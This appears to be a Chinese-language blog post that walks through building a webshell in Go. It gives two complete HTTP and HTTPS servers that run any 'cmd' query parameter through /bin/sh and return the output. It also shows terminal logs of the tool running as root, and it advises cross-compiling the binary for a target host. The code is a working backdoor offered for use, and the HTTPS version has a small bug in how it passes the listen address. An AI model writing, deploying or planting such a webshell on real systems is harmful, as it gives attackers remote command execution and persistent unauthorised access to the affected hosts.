0x00 前言

在这篇文章中,我将记录一下如何使用Golang实现一个webshell。

0x01 HTTP

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
package main

import (
   "fmt"
   "log"
   "net/http"
   "os"
   "os/exec"
)

var shell = "/bin/sh"
var shellArg = "-c"

func main() {
   if len(os.Args) != 2 {
      fmt.Printf("Usage: %s <listenAddress>\n", os.Args[0])
      fmt.Printf("Example: %s localhost:8080\n", os.Args[0])
      os.Exit(1)
   }

   http.HandleFunc("/", requestHandler)
   log.Println("Listening for HTTP requests.")
   err := http.ListenAndServe(os.Args[1], nil)
   if err != nil {
      log.Fatal("Error creating server. ", err)
   }
}

func requestHandler(writer http.ResponseWriter, request *http.Request) {
   // Get command to execute from GET query parameters
   cmd := request.URL.Query().Get("cmd")
   if cmd == "" {
      fmt.Fprintln(
         writer,
         "No command provided. Example: /?cmd=whoami")
      return
   }

   log.Printf("Request from %s: %s\n", request.RemoteAddr, cmd)
   fmt.Fprintf(writer, "You requested command: %s\n", cmd)

   // Run the command
   command := exec.Command(shell, shellArg, cmd)
   output, err := command.Output()
   if err != nil {
      fmt.Fprintf(writer, "Error with command.\n%s\n", err.Error())
   }

   // Write output of command to the response writer interface
   fmt.Fprintf(writer, "Output: \n%s\n", output)
}

image

1
2
3
4
5
6
7
8
9
ec2-user@kali:~/go/src/webshell$ go install webshell
ec2-user@kali:~/go/src/webshell$ ~/go/bin/webshell 0.0.0.0:80
2020/01/01 14:05:55 Listening for HTTP requests.
2020/01/01 14:05:55 Error creating server. listen tcp 0.0.0.0:80: bind: permission denied
ec2-user@kali:~/go/src/webshell$ sudo ~/go/bin/webshell 0.0.0.0:80
2020/01/01 14:06:00 Listening for HTTP requests.
2020/01/01 14:06:04 Request from 54.222.196.177:61772: ifconfig
^C
ec2-user@kali:~/go/src/webshell$

image

0x02 HTTPS

注意把证书和私钥配上就可以走HTTPS了。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
package main

import (
   "fmt"
   "log"
   "net/http"
   "os"
   "os/exec"
)

var shell = "/bin/sh"
var shellArg = "-c"

func main() {
   if len(os.Args) != 2 {
      fmt.Printf("Usage: %s <listenAddress>\n", os.Args[0])
      fmt.Printf("Example: %s localhost:8080\n", os.Args[0])
      os.Exit(1)
   }

   http.HandleFunc("/", requestHandler)
   log.Println("Listening for HTTPS requests.")
   err := http.ListenAndServeTLS( 
      "os.Args[1]", 
      "cert.pem", 
      "privateKey.pem", 
      nil, 
   )
   if err != nil {
      log.Fatal("Error creating server. ", err)
   }
}

func requestHandler(writer http.ResponseWriter, request *http.Request) {
   // Get command to execute from GET query parameters
   cmd := request.URL.Query().Get("cmd")
   if cmd == "" {
      fmt.Fprintln(
         writer,
         "No command provided. Example: /?cmd=whoami")
      return
   }

   log.Printf("Request from %s: %s\n", request.RemoteAddr, cmd)
   fmt.Fprintf(writer, "You requested command: %s\n", cmd)

   // Run the command
   command := exec.Command(shell, shellArg, cmd)
   output, err := command.Output()
   if err != nil {
      fmt.Fprintf(writer, "Error with command.\n%s\n", err.Error())
   }

   // Write output of command to the response writer interface
   fmt.Fprintf(writer, "Output: \n%s\n", output)
}

image

1
2
3
4
ec2-user@kali:~/go/src/httpswebshell$ curl 127.0.0.1:443/?cmd=id
You requested command: id
Output:
uid=0(root) gid=0(root) groups=0(root)

image

0x03 使用方法(交叉编译)

需要针对目标主机的类型,将其编译为对应的可执行文件。
本地测试命令:

1
2
sudo go run ~/go/src/httpswebshell/webshell.go 0.0.0.0:443
go install httpswebshell # 编译

0x04 后记

记录一下使用Golang实现webshell,走HTTP(S)。

0x05 参考文献

[1] Security with Go